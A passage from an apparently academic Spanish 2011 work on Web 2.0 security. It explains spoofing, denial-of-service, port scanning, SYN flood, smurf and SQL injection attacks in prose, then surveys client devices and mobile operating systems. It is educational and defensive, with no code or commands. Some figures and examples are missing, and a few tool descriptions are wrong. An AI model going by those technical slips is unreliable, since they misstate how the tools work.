EJEMPLOS TÉCNICOS : en un ataque de tipo spoofing vemos que existen tres máquinas en juego
que son: un atacante, un atacado y el sistema que se va a suplantar. Para que el pirata
informático consiga establecer una comunicación con atacante deberá evitar que el sistema
suplantado interfiera de alguna manera en ella cosa que no es fácil ya que los servidores hoy
en día imponen trabas para que esto no ocurra.
Para evitar que el sistema suplantado interfiera en la comunicación podríamos modificar las
rutas de red, filtrado de paquetes entre ambos sistemas, lanzar una DoS al servidor atacado o
simplemente esperar a que este desconectado por mantenimiento por ejemplo, etc.
Otra tarea difícil de la que se tendrá que encargar el atacante, es la de falsear la comunicación
entre el sistema del atacante y el del atacado, sin que el sistema suplantado entre en juego. La
manera típica de hacer esto, una vez realizada la DoS al servidor Web, es que el atacante envía
una trama SYN al host atacado con la dirección de origen del servidor suplantado. El host
responde con SYN+ACK al servidor suplantado que ignorará por estar caído gracias al ataque
DoS realizado y finalmente el atacante envía un ACK como si fuera el servidor suplantado,
todo esto controlando los números de secuencia de los paquetes para que ninguno sea
rechazado y conseguir establecer conexión con el host del atacado.
38
Un ISP es una empresa que se dedica a conectar Internet a los usuarios o redes y ofrecer mantenimiento para que el acceso a
internet funcione correctamente. Otros servicios son alojamiento web, registro de dominios, etc.
Página 120
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Como podemos ver, este ataque es un ataque ciego ya que el atacante no puede ver en ningún
momento que todo está saliendo bien en el lado del atacado así que tendrá que confiar en
parte que esto es así.
IP Spoofing
Esta técnica consiste en hacerse con una dirección IP de un host o un servidor y hacerse pasar
por él con el objetivo de obtener información confidencial o provocar un ataque DoS.
Sabemos que en la red no pueden existir dos direcciones IPs iguales porque si no una de las
dos máquinas no funcionaría. Si hablamos de una red con un servidor DHCP 39 (de las siglas
Dynamic Host Configuration Protocol) complicaría más la situación incluso para realizar este
ataque ya que el propio servidor es el que se encarga de designar automáticamente las
direcciones IP de la red.
Un ejemplo de ataque IP Spoofing consistiría en mandar ping con una IP falseada, el host del
atacado responde al ping, lo que provoca que el servidor suplantado reciba respuesta sin
haberla solicitado provocando así un cierre de conexión inmediato y una Denegación de
Servicio.
ARP Spoofing
Este ataque consiste en la construcción de tramas de solicitud y respuestas de tramas ARP
falseadas, de manera que se fuerce al host del atacado a enviar los paquetes al atacante en
vez de hacerlos directamente al servidor de destino. Las comunicaciones TCP/IP se basan en
la resolución de la dirección IP en función de la dirección MAC y para ello en nuestra máquina
residen tablas de ARP que asocian las direcciones MAC con las direcciones IP de la red. Este
ataque trataría de falsear estas direcciones MAC basándose en el envenenamiento de la tabla
de ARP. Veamos una tabla típica de ARP de un host común:
Vemos que para cada dirección IP tenemos una dirección MAC asociada, la cual en teoría no
se puede modificar, cosa que no es cierta.
Este es el típico ataque de MITM (de las siglas Man In The Middle) ya que para que el ataque
funcione la máquina del atacante deberá tanto recoger información del atacado como
mandársela al servidor suplantado para que parezca que se trata de una comunicación
39
DHCP es un protocolo de red que asigna a las máquinas de una red las direcciones IP de manera automática. Es un protocolo
cliente/servidor donde un servidor posee una lista de direcciones IP dinámicas y las va asignando a las máquinas según van
estando libres sabiendo quien estuvo en posesión de esa dirección, el tiempo que estuvo y a quién se le asigno posteriormente.
Página 121
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
completamente normal. Lo que hace la máquina del atacante es enviar el mismo mensaje de
ARP infinitas veces al atacado diciendo que éste es el servidor Web, es decir, provoca un
envenenamiento a la tabla de ARP, pudiendo así engañar a la máquina del atacado. Los dos
equipos, tanto el host del usuario como el servidor, actualizarán su tabla dinámica, la caché de
ARP.
El ARP Spoofing también podría ir enfocado a provocar una DoS en el servidor, por ejemplo, si
incluyésemos en la red dos direcciones MAC exactamente iguales esto daría lugar a una
denegación de servicio inmediata.
DNS Spoofing
El desvío de DNS trata de asociar el DNS (por ej. www.google.com) de nuestra página web
con la IP de un servidor que no es el nuestro, es decir engañar al servidos DNS con una IP de un
servidor (por ej. 192.20.120.12) donde se alojaría otra página Web, de esta manera cuando el
usuario fuera a introducir la dirección el DNS en un navegador verá otra página Web que no es
la de nuestro servidor.
La dificultad del atacante residirá en que no atacará esta vez a un host en concreto sino a un
servidor DNS que estará asociado a un ISP que normalmente tiene un nivel de seguridad
elevado, pero si este ataque tuviese efecto sería muy dañin0 ya que afectaría de forma global
a la red incluso podría contagiarse a otros servidores DNS ya que estos comparten
información. Este ataque podría también realizarse de manera más fácil directamente a un
host en concreto al fichero de asociación de DNS. Por ejemplo, podemos acceder a él desde
un SO Windows a través de esta ruta C:\Windows\system32\drivers\etc\hosts.
Una modificación del archivo hosts provocaría una resolución incorrecta al resolver la
dirección de una página web.
Para conseguir este ataque se puede hacer de diferentes maneras. Se podrían modificar las
entradas del servidor que se encarga de resolver las direcciones DNS falseando las relaciones
Página 122
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Web Spoofing
Este ataque consiste en usurpar una página Web que la victima solicite a través de un
navegador emulando una sesión de navegación completa incluyendo conexiones seguras vía
SSL40 (de las siglas Security Sockets Layer).
Para realizar este ataque, mediante código malicioso se crea una ventana del navegador de
apariencia inofensiva en el host de la víctima y a partir de ahí se enruta todas las páginas Web
dirigida al equipo atacado donde son modificadas para que cualquier evento generado por el
cliente sea registrado, es decir registrar cualquier tipo de datos que introduzca el usuario en el
navegador. La mayoría de las veces para realizar esto se basan en algún tipo de pluging o
control ActiveX por lo que es muy común que se desactive esa opción en los navegadores para
protegerse de estos ataques.
40
SSL o protocolo de Capa de Conexión Segura, proporciona autenticación y privacidad entre
extremos en internet valiéndose para ello de la criptografía.
Página 123
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
PERFIL DEL ATACANTE : este ataque se suele realizar por “hackers” con un nivel bajo de
habilidades técnicas llamados script kiddies ya que con un simple programa y sin
conocimientos ni recursos se podría interrumpir constantemente un servicio. Debido a esto se
trata de uno de los ataques más habituales de la red.
GRAVEDAD DEL ATAQUE : como todos los ataques de DoS, dependiendo del servidor al que
afecte, el ataque tendrá más o menos gravedad.
EJEMPLOS TÉCNICOS : hay muchas formas de realizar un ataque DoS a una máquina vamos a
diferencias entra ataques DoS y DDoS para ver esto de manera más detallada.
Otro tipo de ataque es la inanición de recursos, tratando de agotar los recursos del sistema
como puede ser saturar la CPU, la memoria física, atacando al software del servidor.
Normalmente este ataque provoca un fallo general del sistema o procesos que se cuelgan
pudiendo ser alguno importante para el sistema.
Los errores de programación también pueden ser explotados para provocar una DoS. Si
enviamos datos no estandarizados que no cumplen las normas de definición de protocolo al
servidor, si el protocolo TCP/IP no es capaz de interpretarlos como excepciones podrían
provocar una caída del servidor. En ocasiones este ataque puede ser debido más que a
defectos de programación, defectos del hardware o software, algún chip, defectos de la CPU,
etc.
Los ataques de DNS y de enrutamiento tratan de aprovecharse de que protocolos como RIP
(Routing Information Protocol) o BGP (Border Gateway Protocol) carecen de autenticación, y
debido a ello es posible alterar las rutas correctas falsificando IP de origen y crear una
condición de DoS.
Página 124
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Uno de los ataques más habituales es el llamado packet flooding que consiste en enviar un
gran número de paquetes a un determinado objetivo a través de muchas maquinas ubicadas
en diferentes lugares; dependiendo del tipo de paquete enviado tenemos ping flood, SYN
flood, etc. Posteriormente hablaremos de estos ataques.
Página 125
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
3. Exploración de puertos
DESCRIPCIÓN : este ataque trata de explorar los puertos de nuestro servidor Web con la
intención de encontrar algún agujero de seguridad en esa exploración. Se trata de un ataque
pasivo ya que simplemente se está obteniendo información, no se está modificando nada en
el servidor. Este ataque no es complicado de realizar ya que se puede hacer con un simple
sniffer y difícil de rastrear si la exploración de puerto se hace adecuadamente. También se
trata de un ataque bastante común
PERFIL DEL ATACANTE : los atacantes son gente con un perfil de conocimientos bajo, ya que un
programa de exploración de puertos es muy fácil de usar. Este tipo de atacantes
probablemente la gran mayoría no sepa interpretar bien los resultados del sniffer, por lo que
se trata de los llamados script kiddies.
GRAVEDAD DEL ATAQUE : al ser un ataque pasivo y debido al perfil del atacante en principio no
tendría mayor transcendencia, pero si se consigue encontrar un agujero de seguridad
importante habría que estudiar la gravedad dependiendo de éste.
EJEMPLOS TÉCNICOS : este tipo de ataque, como se especificó antes, se puede realizar con un
simple sniffer. Para el ataque nos bajaremos algún rastreador de puertos, como por ejemplo
Wireshark (para sistemas Windows) o Tcpdump (para sistemas Windows) que es gratuito y
tan fácil como saber la IP del servidor es hacer un escaneo de puertos y esperar a que el
programa de sus resultados.
PERFIL DEL ATACANTE : en principio el nivel de conocimientos que se requiere es alto ya que
hay que conocer los parámetros y la longitud de los paquetes ICMP para poder provocar una
DDoS.
GRAVEDAD DEL ATAQUE : si la inundación por ping consigue provocar una denegación de
servicio distribuida podría suponer grandes pérdidas para la organización atacada.
EJEMPLOS TÉCNICOS : este ataque se trata de saturar una línea con paquetes ICMP. El ataque
usa definiciones de longitud máxima de protocolos y la capacidad de fragmentación de los
datagramas IP provocando una degradación del servicio.
Página 126
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
5. Smurf
DESCRIPCIÓN : se trata de una versión de pingflood. Este tipo de ataque utiliza también la
inundación por ping pero se envía a toda la red, es decir que el efecto que tiene el ataque está
amplificado. Se basa en el uso de servidores de difusión para poder analizar una red entera.
PERFIL DEL ATACANTE : el perfil del atacante es el mismo que para el ataque pingflood.
EJEMPLOS TÉCNICOS : este tipo de ataque se basa en usar mensajes ping al broadcast con
spoofing para inundar un servidor atacado.
- El atacante envía una solicitud echo request, un ping a uno o varios servidores de difusión
falsificando direcciones de IP origen y proporciona la IP de un equipo de destino.
- El servidor o servidores de difusión lo envían al resto de la red.
- Las máquinas de la red envían la respuesta al ping al servidor de difusión.
- El servidor de difusión envía las respuestas al equipo de destino.
Página 127
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Con esto se consigue que el atacante envíe una solicitud a varios servidores de diferentes
redes enrutando todas las respuestas al equipo de destino, de esa manera, el atacante
encontrará una lista de servidores de difusión donde podrá falsificar la dirección de respuesta
para direccionarlas al equipo de destino.
PERFIL DEL ATACANTE : este ataque requerirá conocimientos del protocolo TCP/IP para saber
cómo trabajan las comunicaciones por lo que el atacante deberá tener un nivel de
conocimientos medio-alto.
GRAVEDAD DEL ATAQUE : como todos los ataques DoS dependiendo del servidor al que afecte
el ataque tendrá más o menos gravedad.
EJEMPLOS TÉCNICOS : vamos a verlo de manera más concreta. El ataque consiste en saturar el
trafico de red aprovechando el mecanismo de negociación “Three way handshake” que realiza
el protocolo TCP al iniciar una conexión, ya que se trata de un protocolo con conexión previa;
hay otros protocolos que no necesitan de conexión previa como IP o UDP por ejemplo. El
hecho de que TCP establezca previamente una sesión es para realizar conexiones de manera
más segura.
Página 128
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Este ataque consiste en enviar al servidor muchas solicitudes SYN con una dirección de
usuario inexistente, lo que causa que el servidor se quede en espera del ACK que mandaría el
supuesto usuario. Hay máquinas que son vulnerables a estos ataques, lo que hacen es dejar
conexiones abiertas en cola en la memoria de datos y esperan la recepción del paquete ACK, si
se usan todos los recursos del servidor para almacenar estas solicitud provocara una DoS, un
reinicio del sistema o una caída. Se podría poner caducidad a los paquetes para rechazarlos
tras un periodo de tiempo para poder evitar este ataque.
7. Ataque de fragmentación
DESCRIPCIÓN : el atacante rompe las tramas TCP/IP en fragmentos más pequeños de lo que
deberían ser, que puentean la mayoría de los sistemas de intrusión y detención.
PERFIL DEL ATACANTE : este ataque no es fácil de realizar ya que se necesitan unos mínimos
conocimientos del protocolo TCP/IP.
8. Ataque SNMP
DESCRIPCIÓN : este tipo de ataque trata de explotar vulnerabilidades en el servicio SNMP para
bien provocar una DoS o bien obtener información de la red, parecido a lo que pretendía
conseguir el ataque de exploración de puertos.
PERFIL DEL ATACANTE : se necesitan conocimientos del funcionamiento del protocolo SNMP.
GRAVEDAD DEL ATAQUE : depende de la información que sea capaz de conseguir el atacante.
Página 129
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
9. Inyección de SQL
DESCRIPCIÓN : la gran mayoría de las Web 2.0, por no decir todas, tienen de fondo una gran
base de datos con la información de sus usuarios. Esta base de datos suele estar programada
bajo plataformas Oracle que se basan en código de programación SQL, el cual se encuentra
muy extendido hoy día. Este ataque se basa en manipular ese código para ejecutar alguna
secuencia en el servidor u obtener información.
GRAVEDAD DEL ATAQUE : el ataque puede ir desde obtener información de un simple usuario
hasta poder provocar una DoS.
EJEMPLOS TÉCNICOS : para llevar a cabo este ataque se trata de modificar las sentencias SQL
cerrando los parámetros de manera que el lenguaje lo entienda; para entender esto mejor
vamos a poner un ejemplo.
Esta sentencia de SQL, se trata de una consulta que nos devolvería todos los clientes que se
apelliden González Pérez.
La BD primero seleccionaría los clientes con ese apellido, luego borraría toda la tabla de
clientes y seleccionaría datos que quizá no estén disponibles para los usuarios normales.
Otro tipo de sentencias de inyección de SQL pueden ser las del tipo si ‗nombre =
nombre‘ entonces muéstrame la tabla tal. En esas sentencias básicamente le dices a SQL si
TRUE entonces… es decir que siempre se va cumplir y siempre vamos a poder ejecutar el
código que queramos.
Página 130
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Quizá este tema es más a alto nivel que la simple seguridad en lo que es un servidor Web 2.0
así que hablaremos más delante de ello.
GRAVEDAD DEL ATAQUE : el ataque puede ser grave dependiendo de la información que se
manipule; podría considerarse grave si afecta directamente a los datos de algún usuario.
EJEMPLOS TÉCNICOS : el protocolo HTTP que usa para las comunicaciones vía Web junto a
otros, permite hacer solicitudes de las siguientes maneras:
Cookies
Formularios (solicitudes POST)
Mediante las direcciones URL
Encabezados HTTP (solicitudes GET)
Todos estos datos se pueden manipular por el usuario pos lo que no se pueden considerar
fiables, es decir, no podemos basar la seguridad en las verificaciones del cliente. Es
importante también establecer una conexión SSL41, pero aún con una conexión segura no
podemos asegurarnos que no se manipulen los datos enviados ya que este tipo de conexión
solo evita que la información desde el cliente a la Web viaje por la red de manera confidencial.
Para evitar que se manipulen estos datos al diseñar los formularios se deberán establecer
datos con un valor máximo y mínimo de longitud, con un tipo predefinido de datos y
verificación de caracteres según el tipo de campo que corresponda.
GRAVEDAD DEL ATAQUE : el ataque puede ser grave dependiendo de la información que se
manipule. Si afecta a datos de usuario directamente, como la pasword podría considerarse
grave.
EJEMPLOS TÉCNICOS : para entender mejor de que se trata este ataque vamos a explicar de qué
está compuesta la URL.
41
SSL o Secure Sockets Layer (Protocolo de Capa de Conexión Segura) es un protocolo que proporciona comunicaciones seguras
en Internet a la hora de autenticar usuarios y mantener la privacidad de la información sirviéndose para ello de técnicas
criptográficas
Página 131
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Adicionalmente tras indicar el directorio se pueden enviar parámetros al servidor. Por ejemplo
si tuviéramos esta dirección http://www.google.es/foro/?cat=1&page=2, al incluir la
interrogación tras el nombre de archivo le estaríamos enviando parámetros al servidor.
Página 132
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
¿Cómo podemos proteger los servidores Web? Veamos algunas ideas que requieren un
mantenimiento continuado de los servidores.
Los servidores deberán tener instalado tanto a nivel de host como de red aplicaciones de
protección como software de antivirus y cortafuegos. También es importante instalar
sistemas de detección de intrusos que se tratará de dispositivos hardware y software que
supervisan el acceso a través de la red y desde el servidor; para estos sistemas es importante
que la generación de logs de la actividad de los servidores de manera continuada, es decir,
registrar toda la actividad del sistema y realizar una rutina regular explorando esos registros
para ver los posibles problemas que puedan surgir en las máquinas, actividades sospechosas,
recursos malgastados, etc. una labor de investigación continuada.
Un punto importante es mantener los sistemas actualizados, tanto a nivel de software como
hardware. Si por ejemplo usamos algún sistema operativo con Windows o Linux, o
aplicaciones específicas del servidor por ejemplo programas de IBM o sistemas de BBDD por
ejemplo Oracle bajo SQL, es importante que actualicemos de manera constante estos
servicios con los últimos parches de seguridad así evitaremos tener agujeros de seguridad y
vulnerabilidades innecesarias.
Los mensajes de error que aparezcan en nuestra web se deberán resolver de manera
inmediata. Ciertos mensajes como el típico error 404 debido al típico link roto podrían revelar
más información de la que aparentemente se ve, información de cómo están configuradas las
aplicación, bibliotecas que se usan, conexiones a las bases de datos, etc.
Página 133
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 134
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 11
Hardware y Software del Cliente
11.1. Introducción
Podemos conectarnos a la Web 2.0 desde diferentes dispositivos, no solo desde nuestro
ordenador de casa o portátil.
El problema que surge con estos dispositivos como los móviles o las PDAs (Personal Digital
Assistant) es que requieren una tecnología distinta para este tipo de aplicaciones 2.0 ya que la
situación desde la que nos conectamos es diferente, la velocidad de conexión es menor, la
resolución de la pantalla es diferente, etc.
La primera clasificación de los dispositivos en la parte del cliente la podemos hacer a nivel de
Hardware podemos destacar:
Página 135
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Play Station
Nintendo Wii
Tanto los ordenadores portátiles como los Tablet PC se tratan de dispositivos móviles
también.
Las videoconsolas las incluimos también en nuestra lista ya que aunque no son dispositivos
creados para conectarnos a este tipo de Webs, podríamos acceder a ellas desde estos
dispositivos, es decir, requerirán de un sistema operativo y tecnología diferentes para acceder
a estos portales.
La segunda clasificación que podemos hacer de los dispositivos en la parte del cliente es según
el tipo de Software. Cada uno de estos dispositivos a nivel de cliente lleva incorporado un
sistema operativo y tenemos una gran variedad de sistemas operativos en el mercado; vamos
a destacar los sistemas operativos tanto para ordenadores como para dispositivos móviles que
lideran hoy día el mercado:
Microsoft Windows
Mac OS X
Linux/Unix
iOS (IPhone, iPod touch, IPad)
Android (HTC, Google Nexus One, T-Mobile, Qualcomm, Motorola, etc.)
BlackBerry OS
WebOS (Palm)
Windows Phone (HTC, PDAs, etc.)
Symbian OS (Dispositivos Nokia)
A parte de los diferentes sistemas operativos para conexión a internet que existen hoy en día,
destacamos los navegadores principales que existen hoy en día para conectarnos a la Web
2.0.
Internet Explorer
Google Chrome
Mozilla Firefox
Safari
Opera
Netscape
Página 136
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
11.2. Hardware
Vamos a echar un vistazo a los dispositivos desde los que nos podemos conectar a las Webs
2.0.
11.2.2. Tablet PC
El Tablet PC es ordenador portátil con pantalla táctil. Está a caballo entre un ordenador y un
dispositivo móvil.
Algunos ejemplos de estos son el IPad, iFree Tablet, Wepad o Chrome OS tablet.
El máximo exponente en la historia del tablet pc a sido el IPad de Apple con diferencia tanto
en número de ventas como en el aspecto tecnológico en lo que respecta hoy en día. Se trata
del primer ordenador táctil en contar con internet ya que incorpora tecnología Wi-Fi y 3G.
Página 137
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Al Ipad le están surgiendo varios competidores. En concreto Google sacará a la venta su nuevo
tablet pc llamado Chrome OS Tablet que tiene la característica de poder ejecutar varias
aplicaciones a la vez, algo que ha sido criticado en el caso del IPad ya que este no lo hace. Este
tablet estará fabricado por HTC, la misma empresa que desarrolló el Nexus One.
Otra alternativa al IPad son WePad basado en Android y con un coste inferior al IPad hecho
por la empresa alemana Neofonie y que incorpora algunas utilidades que no tiene IPad como
Webcam, lector de tarjetas y modem UMTS.
Página 138
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Está orientado a la usabilidad y a la accesibilidad principalmente, para que adultos y niños que
no han manejado un ordenador nunca, lo sepan utilizar e incorpora herramientas para
discapacitados y programas educativos.
Se desarrollo entre Microsoft, Intel y Samsung entre otros. Los sistemas operativos que usa
son Windows XP Tablet PC Edition 2005, Windows Vista Home Premium Edition y Linux.
Página 139
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
La mayoría de estos teléfonos tienen una aplicación desarrollada para cada portal 2.0. Es así
que tenemos una aplicación para Facebook, Tuenti, Youtube, Twitter, aplicaciones de Google,
etc.
Los smartphones más renombrados son IPhone, BlackBerry y Nexus ONE. Otro ejemplos clave
son HTC, Palm Pre/Pixi, Nokia serie E, Nokia serie N, Motorola serie MOTO Q.
Página 140
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El último modelo, el IPhone 4, incorpora cámara de fotos para foto y video HD, reproductor de
música IPod, videollamada y la capacidad de ser un teléfono multitarea. Todas las
aplicaciones 2.0 que deseemos tener las podemos descargar de la tienda de Apple, la App
Store. El próximo modelo de IPhone saldrá a finales del 2011.
Página 141
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El Nexus One es el primer teléfono inteligente que desarrolla Google y está desarrollado por
HTC Corporation de Taiwan. Su sistema operativo es Android. Salió al mercado en enero de
2010.
Página 142
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Estos dispositivos tienen pantalla táctil, suelen incorporar tecnologías como Infrarrojos,
Bluetooth, Wi-Fi o GPS. Algunas de ellas permiten navegar por internet y sincronización de
correo electrónico.
Existen múltiples sistemas operativos y dispositivos que compiten en este mercado. Podemos
ver sistemas operativos como Android, Windows Mobile, iOS, Palm OS, Pocket PC, Symbian
OS, Linux, etc.
Podría decirse que la evolución de las PDAs desde cuando eran simplemente agendas a lo que
son hoy en día hace que la línea entre PDA y smartphone sea realmente pequeña, muchos de
estos dispositivos se podría considerar que están en ambos bandos.
Página 143
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
11.2.4. Videoconsolas
Las videoconsolas no son dispositivos creados para poder consultar aplicaciones 2.0, pero
podemos hacerlo ya que las nuevas videoconsolas de bolsillo con conexión a Internet
permiten la conexión a estos portales ya sea desde algún navegador o desde aplicaciones.
Algunas de las nuevas videoconsolas que no son portables también permiten el acceso a la
Web 2.0.
Algunas de las videoconsolas con estas funcionalidades son Sony PSP (PlayStation Portable),
Play Station, Nintendo DSi o Nintendo Wii.
Página 144
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
11.3. Software
En el año 2006 nació el proyecto MUSIC de la Unión Europea. El proyecto nació con la idea de
proveer tecnología para el desarrollo de aplicaciones para móviles innovadoras cuando nadie
hablaba de Android o de Iphone, una auténtica revolución en el día a día de las personas.
MUSIC se trata de un middelware, es decir, un conjunto de programas que se instalan en
cualquier dispositivo móvil independientemente del sistema operativo haciendo posible el
funcionamiento de aplicaciones. A nivel de usuario es completamente transparente. El éxito
de este proyecto se debe a la innovación y a la posibilidad de trabajar en un entorno de código
abierto.
Se han desarrollado determinadas aplicaciones muy útiles unidas a este proyecto. Por
ejemplo la aplicación PRM para personas con discapacidad física que permitan moverse con
seguridad en las redes de transporte público de otros países o lugares que desconozcan. Otra
aplicación llamada Travel Tourist Assistant que sirve de guía turística para los viajeros con
información necesaria en tiempo real. Existe otra aplicación llamada Instant Social que se
trata de una aplicación que permite a los usuarios crear su propio chat compartiendo
contenidos y fotografías. Contiene un servicio llamado Service Location Protocol que permite
entrar en contacto con servicios de otros terminales, como por ejemplo la creación de
comunidades de usuarios que puedan comunicarse entre sí sobre temas que les interesen en
tiempo real. La idea general es concebir programas que se adapten al contexto de cada
usuario en concreto. Gracias a esta idea los sistemas operativos que existen hoy en día,
podemos ver cómo han tenido un desarrollo muy enfocado a las redes sociales y a las
aplicaciones 2.0.
Página 145
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Según otras fuentes43 a fecha de septiembre de 2010, podemos ver que los datos son
similares. El sistema operativo para smartphones más usado es Symbian OS seguido de iOS y
RIM.
Ilustración 35. Uso de los sistemas operativos de smartphones (Jun 09 – Jun 11).
Fuente: http://gs.statcounter.com/.
42
Fuente: Wikipedia a septiembre de 2010: http://es.wikipedia.org/wiki/Smartphone.
43
Fuente: StatCounter, http://gs.statcounter.com.
Página 146
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Los sistemas operativos más usados44 en los ordenadores personales según StatCounter
son:
Ilustración 36. Uso de los sistemas operativos a nivel global (Jun 09 – Jun 11).
Fuente: http://gs.statcounter.com/.
Vamos a ver los principales sistemas operativos que están más relacionados con la Web 2.0.
Iremos viendo cómo todos éstos en su desarrollo han ido integrando cada vez más las redes
sociales hasta llegar al punto de ser una de las funcionalidades más importantes de los
dispositivos de estos sistemas operativos.
Symbian OS
Se trata de un sistema operativo creado por Nokia, Sony Ericsson, Psion, Samsung, Siemens,
Arima, Benq, Fujitsu, Lenovo, LG; Motorola, Mitsubishi Electric, Panasonic, Sharp, etc. Estas
empresas se unieron para crear un nuevo sistema operativo para teléfonos inteligentes que
compitiera con WebOS de Palm y Windows Mobile.
44
Fuente: StatCounter, http://gs.statcounter.com.
Página 147
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Nokia desarrolló un cliente llamado Social Messaging bajo Symbian OS, que integra varias
redes sociales en el mismo cliente. La idea es comunicarse con todas nuestras redes sociales a
través del mismo gestor. También hay desarrolladas otras aplicaciones para Web 2.0 como
IM+ para Skype o la aplicación Foursquare buscador de locales de ocio de amigos.
BlackBerry OS
Este sistema operativo está diseñado exclusivamente para dispositivos BlackBerry por la
empresa Research in Motion. Hay otras marcas que también hacen uso de este sistema
operativo como Siemens, HTC o Sony Ericson.
El desarrollo de este sistema operativo se hizo cuando aparecieron las primeras PDA en 1999.
El sistema operativo es multitarea y está orientado para uso profesional. Sus funcionalidades
esenciales son la sincronización del correo electrónico y su agenda.
El nuevo sistema operativo BlackBerry 6 presentado en el 2010 por RIM simplifica el manejo
de las redes sociales como Facebook, Twitter o MySpace y programas de mensajería
instantánea BlackBerry Messenger y Windows Live. Todas las aplicaciones sociales están
Página 148
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
incluidas en una sola aplicación como se puede apreciar en este video promocional de
BlackBerry OS 6
http://www.youtube.com/watch?v=plWOkI_Urwo&feature=player_embedded#!
iOS
Este sistema operativo desarrollado por Apple nacido en junio de 2007 se creó originalmente
para Iphone, pero también adaptado para Ipod Touch e Ipad. Originalmente se llamaba
Iphone OS.
Está basado en el sistema operativo Mac OS X y su núcleo está basado en Darwin BSD. Al
igual que BlackBerry está orientado más al mundo profesional, iOS y sus dispositivos están
más orientados al diseño y a la usabilidad con capacidad de sincronización de correos, agenda,
etc. al igual que BlackBerry OS.
Existen alrededor de 185.000 aplicaciones disponibles para iOS en la App Store de Apple y
muchas de ellas basadas en redes sociales. El sistema operativo iOS 4 que salió al mercado en
junio de 2010 integra principalmente las Web 2.0 YouTube y Facebook.
Según un estudio45 del pasado año por la empresa Nielsen de España el 25% de los usuarios
de las redes sociales como Facebook se conectan a estas mediante su dispositivo IPhone y
entre estos un 51% lo usa para leer mensajes, un 49% lo utiliza para enviar mensaje desde el
móvil y un 31% de los encuestados usa el teléfono para subir imágenes a las redes sociales.
Según este estudio en el primer trimestre del pasado 2009, 330.000 españoles se conectan a
45
Estudio realizado por la empresa Nielsen. http://www.celulais.com/1738/iphone-numero-uno-en-redes-sociales/
Página 149
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
distintas redes sociales desde el IPhone, lo que quiere decir que es el teléfono inteligente más
usado en las redes sociales por la población española.
Windows Phone
Este sistema operativo ha sido desarrollado por Microsoft Anteriormente se denominaba
Windows Mobile, más conocido todavía hoy por este nombre. Está desarrollado para
teléfonos inteligentes y también para Pocket PC.
El núcleo del sistema operativo se basa en Windows CE (sistema operativo para dispositivos
móviles de 32 bits nacido en 1994) y las aplicaciones básicas usan las API de Microsoft
Windows.
Las principales tendencias de los usuarios de Windows Mobile han sido para redes sociales y
mensajería instantánea. Como sus compañeros BlackBerry OS y iOS integra diversas
aplicaciones para diferentes portales Web 2.0 como Facebook o Twitter.
Su última versión Windows Phone 7 salió al mercado en febrero de 2010. Se puede leer en la
Web oficial de Microsoft que este nuevo sistema operativo se caracteriza por ser una
“Plataforma Móvil Social” que debe “llevar las redes sociales a la vida, mediante su integración
en las experiencias básicas”.
Android
Android ha sido desarrollado por la Open Handset Alliance (OHA) que engloba a empresas
como Google, HTC, Dell, Intel, Motorola, Qualcomm, Texas Instruments, Samsung, LG, T-
Mobile, Nvidia o Wind River Systems.
El sistema operativo está basado en Linux, depende de Linux para los servicios base del
sistema como pueden ser los de seguridad, gestión de memoria, gestión de procesos,
controladores, etc. Su código fuente está disponible bajo licencias de software libre y código
abierto. Podemos conocer acerca de su última versión Android 2.2 mediante su Web oficial
www.android.com.
Página 150
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Las aplicaciones más destacadas de Android para redes sociales son Twicca (para Twitter),
Facebook, Tuenti, Nimbuzz (programa de chat que engloba Gtalk, MSN Messenger, Skype,
Facebook chat, Yahoo, AIM, MYSpace, ICQ, StudiVZ, SchuelerVZ, Gady Gady y Hyves) y
Foursquare (nueva red social para terminales móviles).
Palm WebOS
Es un sistema operativo desarrollado por Palm hoy en día propiedad de HP. Se presento en
junio de 2009 junto al teléfono inteligente Palm Pre.
Está basado en Linux e incluye las típicas funcionalidades de los sistemas operativos para
teléfonos inteligentes como una interfaz gráfica para pantalla táctil, es multitarea, correo,
agenda, etc. Usa tecnologías como HTML 5, JavaScript, CSS, etc.
Página 151
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El navegador web que incluye está basado en WebKit y es similar a Safari, Chrome o el
navegador de Android.
El sistema operativo incluye una característica llamada “Synergy” que permite al usuario
acceder a sus cuentas de GMail, Yahoo!, Facebook, LinkedIn y Microsoft Oulook.
Página 152
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Algunas funcionalidades corporativas se extienden más allá de las empresas, permitiendo así
los teléfonos inteligentes realizar algunas actividades comunes:
Finalmente llegamos a la conclusión de que las vulnerabilidades que puedan generar estos
teléfonos móviles provienen de las siguientes debilidades:
Página 153
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
